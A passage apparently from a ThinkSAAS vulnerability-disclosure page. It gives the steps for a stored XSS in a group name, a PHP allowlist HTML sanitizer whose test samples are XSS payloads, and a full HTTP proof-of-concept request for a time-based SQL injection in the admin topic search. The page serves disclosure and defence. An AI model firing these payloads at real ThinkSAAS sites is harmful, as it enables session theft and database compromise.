-----------------------------159522762613371--

2. admin1 invites admin2 as an administrator of this new group and posts anything. PS: no consent is needed; one can invite anyone as one's group administrator.
3. Once admin2 edits any post in this group, or just clicks http://yourdomain/thinknew/index.php?app=group&ac=topicedit&topicid={your_topic_id_which_easy_to_get}, admin2 executes the JS code that was injected into the group name.
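Every stored-XSS report on this page (SVG embed in comments, javascript: iframe in article comments, script tag in the group description, onerror image in the group name, script in the course title) stores user-supplied markup and re-renders it for other users. As an added example, not ThinkSAAS code and not the project's own filter, the block below is an allowlist sanitizer built on ext-dom (libxml): it keeps a handful of formatting tags, drops script/iframe/embed/svg and their content, unwraps any other element, strips every attribute that is not allowlisted, and rejects non-http(s) hrefs. The tag list and the function names are this example's own choices.

```php
<?php
// Added example, not ThinkSAAS code: allowlist HTML sanitizer for stored
// user content. Requires ext-dom.
declare(strict_types=1);

const ALLOWED_TAGS = ['p', 'br', 'b', 'strong', 'i', 'em', 'u', 'a', 'ul', 'ol', 'li', 'blockquote', 'code', 'pre'];
const ALLOWED_ATTRS = ['a' => ['href']];
// Elements whose content must go too: scripts, plug-in/frame containers, foreign content.
const DROP_WITH_CONTENT = ['script', 'style', 'iframe', 'frame', 'object', 'embed', 'svg', 'math', 'template'];

function sanitizeHtml(string $html): string
{
    $doc = new DOMDocument();
    $prev = libxml_use_internal_errors(true);           // unknown HTML5 tags only produce warnings
    // The XML PI tells libxml the input is UTF-8; <body> gives one container to walk.
    $doc->loadHTML('<?xml encoding="UTF-8"><body>' . $html . '</body>');
    libxml_use_internal_errors($prev);

    $body = $doc->getElementsByTagName('body')->item(0);
    cleanNode($body);

    $out = '';
    foreach ($body->childNodes as $child) {
        $out .= $doc->saveHTML($child);                  // text nodes come back entity-escaped
    }
    return $out;
}

function cleanNode(DOMNode $node): void
{
    // Walk a snapshot: removing or moving children mutates the live list.
    foreach (iterator_to_array($node->childNodes) as $child) {
        if ($child instanceof DOMElement) {
            $tag = strtolower($child->tagName);
            if (in_array($tag, DROP_WITH_CONTENT, true)) {
                $node->removeChild($child);
            } elseif (!in_array($tag, ALLOWED_TAGS, true)) {
                // Unknown element (img, div, ...): keep its cleaned children, drop the element.
                cleanNode($child);
                while ($child->firstChild !== null) {
                    $node->insertBefore($child->firstChild, $child);
                }
                $node->removeChild($child);
            } else {
                cleanAttributes($child, $tag);
                cleanNode($child);
            }
        } elseif (!($child instanceof DOMText)) {
            $node->removeChild($child);                  // comments, processing instructions
        }
    }
}

function cleanAttributes(DOMElement $el, string $tag): void
{
    $allowed = ALLOWED_ATTRS[$tag] ?? [];
    foreach (iterator_to_array($el->attributes) as $attr) {
        $name = strtolower($attr->name);
        if (!in_array($name, $allowed, true) || ($name === 'href' && !isSafeUrl($attr->value))) {
            $el->removeAttribute($attr->name);           // on*=, style=, src=, javascript: hrefs
        }
    }
    if ($tag === 'a' && $el->hasAttribute('href')) {
        $el->setAttribute('rel', 'noopener nofollow');
    }
}

function isSafeUrl(string $url): bool
{
    // Browsers drop tabs/newlines inside a URL, so "java\nscript:" still runs; drop them first.
    $url = preg_replace('/[\x00-\x20\x7f]+/', '', $url);
    if ($url === '' || !preg_match('/^[a-z][a-z0-9+.\-]*:/i', $url)) {
        return true;                                     // relative or protocol-relative URL
    }
    return (bool) preg_match('#^https?:#i', $url);
}

// --- constructed samples modelled on the reports above ---
$samples = [
    '<p>aaa<br><embed src=//html5sec.org/test.svg /></p>',
    "<p>1</p><iframe src=javascript:alert('x') height=0 width=0></iframe>",
    'xss<script>alert(1)</script>',
    '<img src=1 onerror=alert(1)>group name',
    'describe1<script src="1.js">',
    '<a href="javascript:alert(1)">bad</a> <a href="https://example.org/">good</a>',
];
foreach ($samples as $s) {
    $clean = sanitizeHtml($s);
    assert(stripos($clean, '<script') === false && stripos($clean, '<iframe') === false);
    assert(stripos($clean, '<embed') === false && stripos($clean, 'onerror') === false);
    assert(stripos($clean, 'javascript:') === false);
}
assert(sanitizeHtml('<b>bold</b> text') === '<b>bold</b> text');   // harmless markup survives
assert(sanitizeHtml('<p>aaa<br></p>') === '<p>aaa<br></p>');
echo "ok\n";
```

Sanitize once on input and still escape on output wherever the value is placed into an attribute or a textarea, since the allowlist only covers the body-text context.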

Post-Auth SQL injection vulnerability in app/topic/action/admin/topic.php

The title parameter of app/topic/action/admin/topic.php has a SQL injection vulnerability.

GET /index.php?app=topic&ac=admin&mg=topic&ts=list&title=PoC%%2527+and/**/1-(select/**/1/**/from/**/(select+sleep(3))a)%2523%2520 HTTP/1.1
Host: thinksaas
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4230.1 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-SG,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://thinksaas/index.php?app=search&ac=s&kw=keyword
Cookie: PHPSESSID=6im4ssqo33h8l2d43u78nbr4c3;  ts_autologin=goh59atl3dsk44o4sws48s80co44ww8
Upgrade-Insecure-Requests: 1

Will cause a delay of 6 seconds
